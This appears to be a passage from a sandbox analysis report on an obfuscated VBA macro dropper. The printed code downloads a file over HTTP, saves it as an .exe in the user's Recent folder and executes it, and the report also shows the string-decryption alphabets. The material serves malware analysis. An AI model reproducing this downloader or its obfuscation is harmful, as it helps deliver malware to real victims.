                                              If \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.Status = 200 Then

                                              IXMLHTTPRequest.Status() -> 200

                                              executed
                                              64

                                              Set \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa = CreateObject("adodb.stream")

                                              CreateObject("adodb.stream")

                                              executed
                                              65

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Open

                                              Stream.Open()

                                              executed
                                              66

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Type = \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb

                                              Type

                                              67

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Write \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5


                                              executed
                                              68

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.SaveToFile \xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8, \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb + \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb

                                              SaveToFile

                                              69

                                              \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa.Close

                                              Close

                                              70

                                              Endif

                                              71

                                              \xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf.Open (\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8)

                                              IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe")

                                              executed
                                              72

                                              End Sub

                                              APIs | Meta Information

                                              Len

                                              Len("\V\xfffdZVQX\xfffd\xfffdT.\xfffd\xfffd\xfffd") -> 14 Len("h\xfffd\xfffd\xfffd\xfffd://www.\xfffd\xfffd\xfffd\xfffd\xfffdm\xfffd\xfffd\xfffd.\xfffd\xfffdm/\xfffddj\xfffdg\xfffd\xfffdzlk\xfffd\xfffdk\xfffdzk\xfffd\xfffdg\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdNbg\xfffd\xfffdgg\xfffd\xfffdh\xfffd/d\xfffdhd\xfffd\xfffdjd\xfffd\xfffd\xfffdj\xfffd\xfffd\xfffd\xfffdw\xfffdw\xfffdw\xfffd\xfffd\xfffd\xfffdgh\xfffdd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdw\xfffdw\xfffd\xfffd\xfffd\xfffd/\xfffdg\xfffd\xfffdd\xfffdh\xfffd\xfffdjh\xfffd\xfffdjgh\xfffd\xfffdg\xfffd\xfffd\xfffdg\xfffd\xfffdj\xfffdhd\xfffdh\xfffd\xfffd\xfffdh/\xfffdd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdg\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdz/\xfffd\xfffd\xfffdh\xfffdzdhhz.\xfffd\xfffd\xfffd") -> 179

                                              InStr

                                              InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","V") -> 77 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 107 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","Z") -> 81 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","Q") -> 72 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","X") -> 79 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 102 InStr(" 
?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 109 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","T") -> 75 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",".") -> 52 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 88 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 98 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","h") -> 33 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 96 InStr(" 
?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 93 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 95 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",":") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","/") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","w") -> 48 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 90 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 86 InStr(" 
?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","m") -> 38 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 91 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 87 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 92 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","d") -> 29 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","j") -> 35 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 89 InStr(" 
?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","g") -> 32 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","z") -> 51 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","l") -> 37 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","k") -> 36 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","N") -> 69 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","b") -> 27 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 94 InStr(" 
?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 99

                                              Mid

                                              Mid

                                              Mid

                                              Strings | Decrypted Strings
                                              " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"
                                              " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"
                                              Line | Instruction | Meta Information
                                              9

                                              Function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6)

                                              10

